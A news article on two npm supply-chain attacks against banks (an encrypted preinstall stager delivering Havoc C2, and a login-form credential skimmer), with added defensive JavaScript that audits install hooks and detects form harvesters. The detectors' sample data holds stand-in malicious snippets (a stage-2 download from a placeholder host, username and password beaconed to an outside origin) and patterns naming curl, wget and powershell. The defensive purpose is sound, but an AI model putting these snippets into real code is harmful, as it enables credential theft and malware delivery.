In two separate incidents, threat actors recently tried to introduce malware into the software development environment at two different banks via poisoned packages on the Node Package Manager (npm) registry.
Researchers at Checkmarx, who observed the attacks, believe them to be the first instances of adversaries targeting banks through the open source software supply chain. In a report this week, the vendor described the two attacks as part of a larger trend it has observed recently in which banks are the specific targets.
Advanced Techniques and Targeting
“These attacks showcased advanced techniques, including targeting specific components in Web assets of the victim bank by attaching malicious functionalities to it,” Checkmarx said.
The vendor highlighted an April attack in its report. In that incident, a threat actor posing as an employee of the target bank uploaded two malicious packages to the npm registry. Checkmarx researchers found a LinkedIn profile suggesting that the package contributor worked at the bank, and initially assumed the packages were part of a penetration test the bank was conducting.
Both packages declared a preinstall script, an npm lifecycle hook that runs automatically on any machine that installs the package, which is how the malicious code first executed on victim systems. The script began by identifying the host operating system; then, depending on whether it was Windows, Linux, or macOS, it decrypted the matching encrypted file bundled inside the package. The decrypted code in turn downloaded a second-stage payload from an attacker-controlled command-and-control (C2) server.
“The attacker cleverly utilized Azure’s CDN subdomains to effectively deliver the second-stage payload,” Checkmarx said. “This tactic is particularly clever because it bypasses traditional deny list methods, due to Azure’s status as a legitimate service.” To make the download look even more legitimate and harder to spot, the threat actor used a subdomain that incorporated the target bank's name.
Checkmarx's analysis identified the second-stage payload as Havoc Framework, an open source command-and-control framework that red teams commonly use for post-exploitation during authorized security testing. Havoc has also become popular with threat actors because of its ability to evade Windows Defender and other standard endpoint security controls, Checkmarx said.
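The install-time chain just described is easy to miss because nothing about it shows in the package's exported API; it lives in the manifest's lifecycle hooks and in whatever file those hooks invoke. The following is an added example (not code from Checkmarx or from the packages in the report) of the audit a build pipeline can run over a dependency tree: it lists every package that declares an npm install lifecycle hook and scores the code that hook runs for the three traits in the chain above (branching on the host OS, decrypting an embedded blob, reaching out to the network). The package names, manifests and script bodies are constructed sample data, and the indicator regexes are assumptions for the example, not a signature taken from the report.

```javascript
// Added example (not from Checkmarx or the report it describes): audit a set
// of npm package manifests for install-time lifecycle hooks and score the
// code those hooks run for the three traits described above: branching on
// the host OS, decrypting an embedded blob, and reaching out to the network.
// All manifests and script bodies below are constructed sample data.

const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Indicator families. Each on its own is common in legitimate packages;
// the combination is what the chain in the report looks like. These
// patterns are assumptions for the example, not a published signature.
const INDICATORS = {
  osBranch: [/process\.platform/, /os\.platform\(\)/, /\b(win32|darwin|linux)\b/],
  decrypt: [/createDecipheriv\(/, /\.decrypt\(/, /Buffer\.from\([^)]*['"]base64['"]/],
  network: [/https?\.get\(/, /\bfetch\(/, /child_process/, /\b(curl|wget|powershell)\b/],
};

function hooksDeclared(manifest) {
  const scripts = manifest.scripts || {};
  return INSTALL_HOOKS.filter((h) => Object.prototype.hasOwnProperty.call(scripts, h));
}

function indicatorsIn(source) {
  return Object.entries(INDICATORS)
    .filter(([, patterns]) => patterns.some((re) => re.test(source)))
    .map(([family]) => family);
}

// pkgs: [{ manifest: <package.json object>, files: { "<path>": "<source>" } }]
// Returns one finding per package that declares an install hook.
function auditPackages(pkgs) {
  const findings = [];
  for (const { manifest, files } of pkgs) {
    const hooks = hooksDeclared(manifest);
    if (hooks.length === 0) continue; // no code runs at install time
    // Scan the hook command lines plus every shipped file, since the hook
    // usually just invokes a file elsewhere in the tarball ("node setup.js").
    const source = [
      ...hooks.map((h) => manifest.scripts[h]),
      ...Object.values(files || {}),
    ].join("\n");
    const indicators = indicatorsIn(source);
    findings.push({
      name: manifest.name,
      version: manifest.version,
      hooks,
      indicators,
      // Native add-ons legitimately run "install"; only the combination
      // of traits earns a block verdict, everything else goes to review.
      verdict: indicators.length >= 2 ? "block" : "review",
    });
  }
  return findings;
}

// Constructed sample tree: a plain library, a native add-on, and a stand-in
// for the kind of package described in the report (the name is invented).
const SAMPLE_PACKAGES = [
  {
    manifest: { name: "pad-strings", version: "1.0.0", scripts: { test: "node test.js" } },
    files: { "index.js": "module.exports = (s, n) => s.padStart(n);" },
  },
  {
    manifest: { name: "native-thing", version: "2.1.0", scripts: { install: "node-gyp rebuild" } },
    files: { "binding.gyp": "{ targets: [] }" },
  },
  {
    manifest: { name: "bank-internal-utils", version: "0.0.3", scripts: { preinstall: "node setup.js" } },
    files: {
      "setup.js": [
        "const crypto = require('crypto'); const https = require('https');",
        "const blob = { win32: 'w.bin', linux: 'l.bin', darwin: 'm.bin' }[process.platform];",
        "const d = crypto.createDecipheriv('aes-256-cbc', KEY, IV);",
        "https.get('https://example.invalid/stage2', () => {});",
      ].join("\n"),
    },
  },
];

console.log(JSON.stringify(auditPackages(SAMPLE_PACKAGES), null, 2));
```

In a real tree, `npm query ":attr(scripts, [preinstall])"` (and the same for `postinstall`) lists the installed packages that declare those hooks, which is the input a check like this would consume. `npm install --ignore-scripts`, or `ignore-scripts=true` in `.npmrc`, disables install hooks outright, at the cost of breaking packages that genuinely build native code, which is why the example sends those to review rather than blocking them. Note that the network indicator is "any outbound call at install time", not a domain list: as the report's Azure CDN point shows, a deny list of hostnames does not help when the stager is hosted on a legitimate service.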
“Deploying the Havoc framework would have given the attacker access to the infected machine inside the bank's network,” says Aviad Gershon, security researcher at Checkmarx, in comments to Dark Reading. “From there, the consequences [would have been] dependent on the bank's defenses and the attacker's abilities and purpose — data theft, money theft, ransomware, etc.”
Specific Victim
The other attack Checkmarx reported on this week happened in February. Here too the threat actor, unrelated to the one behind the April incident, uploaded a package containing a malicious payload to npm. In this case the payload was engineered for one bank in particular: it was built to hook a specific login form element on the bank's website and to capture and transmit whatever users entered into that form when logging in.
Characteristics of both npm packages tied them not just to the banking industry in general but to the specific banks, Gershon says. “The first attack we describe in the blog was obviously targeting a specific bank, falsifying a persona of a bank employee, and using crafted domains which include the bank's name,” he says. “Both of these tactics were used in order to gain credibility and lure bank developers to download it.” Even so, had a user unconnected to the bank installed that package, they would have been infected just the same, Gershon adds.
In the second attack the payload targeted a specific and unique HTML element in one application of one bank, he says. “Hence in this instance this poisoned package would probably not have hurt other users downloading and installing it.” The attacker's motive in building the package was to steal the login credentials users entered into that element.
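The tell in the second payload is the mismatch between what a generic-looking dependency claims to do and the one element it reaches for. As an added example (not the report's code and not the attacker's), the check below scans front-end sources for the combination of a selector aimed at a login form or credential field, code that reads what the user types, and a sink that can carry it to an origin other than the application's own. The script sources, the element IDs and the allowed origin `https://bank.example` are all constructed for the example, and the regexes are heuristics of my own, not a signature from the report.

```javascript
// Added example (not from the Checkmarx report): a static check for
// front-end JavaScript that hooks a particular login form, reads what the
// user types and sends it somewhere other than the application's own origin,
// which is the payload shape described above. The sources below are
// constructed, and the allowed origin is an assumption for the example.

const ALLOWED_ORIGINS = new Set(["https://bank.example"]);

// A selector aimed at a credential-bearing element (form, user/password fields).
const RE_TARGET = /(?:querySelector(?:All)?|getElementById|getElementsByName)\(\s*['"]([^'"]*(?:login|signin|passw|user|pin|otp)[^'"]*)['"]\s*\)/i;
// Reading user input: a submit/input listener, FormData, or .value reads.
const RE_CAPTURE = /addEventListener\(\s*['"](?:submit|input|keyup|change)['"]|new FormData\(|\.value\b/;
// Anything that can carry data off the page.
const RE_SEND = /\b(?:fetch|navigator\.sendBeacon|XMLHttpRequest|new Image)\b|\.src\s*=/;
const RE_URL = /https?:\/\/[^\s'"`)]+/g;

// Every absolute URL in the source whose origin is not on the allow list.
function externalOrigins(source) {
  const origins = new Set();
  for (const m of source.match(RE_URL) || []) {
    try {
      const origin = new URL(m).origin;
      if (!ALLOWED_ORIGINS.has(origin)) origins.add(origin);
    } catch {
      // not a parseable URL, ignore
    }
  }
  return [...origins];
}

// scripts: [{ name, source }]. A script is reported only when all three
// traits line up: it targets a credential element, captures input, and
// has somewhere foreign to send it. The app's own login code has the first
// two traits too, so the origin check is what separates it from a harvester.
function findFormHarvesters(scripts) {
  const findings = [];
  for (const { name, source } of scripts) {
    const target = source.match(RE_TARGET);
    if (!target || !RE_CAPTURE.test(source) || !RE_SEND.test(source)) continue;
    const origins = externalOrigins(source);
    if (origins.length === 0) continue; // talks only to the app's own origin
    findings.push({ name, targetSelector: target[1], externalOrigins: origins });
  }
  return findings;
}

// Constructed sample bundle: the app's own login code, an unrelated utility,
// and a stand-in for a dependency carrying a hook for one site's login form.
const SAMPLE_SCRIPTS = [
  {
    name: "login.js",
    source: [
      "const f = document.querySelector('#login-form');",
      "f.addEventListener('submit', (e) => { e.preventDefault();",
      "  fetch('https://bank.example/api/session', { method: 'POST', body: new FormData(f) }); });",
    ].join("\n"),
  },
  {
    name: "format-money.js",
    source: "export const money = (n) => n.toLocaleString('en-US', { style: 'currency', currency: 'USD' });",
  },
  {
    name: "ui-helpers.js",
    source: [
      "const f = document.getElementById('onlineBankingLoginForm');",
      "f.addEventListener('submit', () => {",
      "  const u = f.querySelector('#username').value, p = f.querySelector('#password').value;",
      "  navigator.sendBeacon('https://cdn-assets.invalid/s', JSON.stringify({ u, p }));",
      "});",
    ].join("\n"),
  },
];

console.log(JSON.stringify(findFormHarvesters(SAMPLE_SCRIPTS), null, 2));
```

The reported `targetSelector` is the part worth a human look: a helper library that names one bank's login form element has no business doing so. The matching runtime control is a Content-Security-Policy whose `connect-src` is restricted to the application's own origin, which blocks the `fetch` and `sendBeacon` sinks; an image beacon (`new Image().src = ...`) falls under `img-src`, so that directive needs to be equally tight.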
Attacks involving poisoned packages on popular open source repositories and package managers such as npm and PyPI have surged in recent years. A study ReversingLabs conducted earlier this year found a 289% increase in attacks on open source repositories since 2018. The goal behind many of these attacks is to sneak malicious code into enterprise software development environments to steal sensitive data and credentials, surreptitiously install malware, and carry out other malicious activity.
Checkmarx says the two attacks it reported this week are the first known instances of banks being singled out as the targets of such campaigns.